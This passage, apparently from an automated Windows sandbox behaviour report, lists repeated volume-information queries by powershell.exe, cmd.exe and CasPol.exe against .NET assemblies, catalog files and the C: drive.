Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\cmd.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
|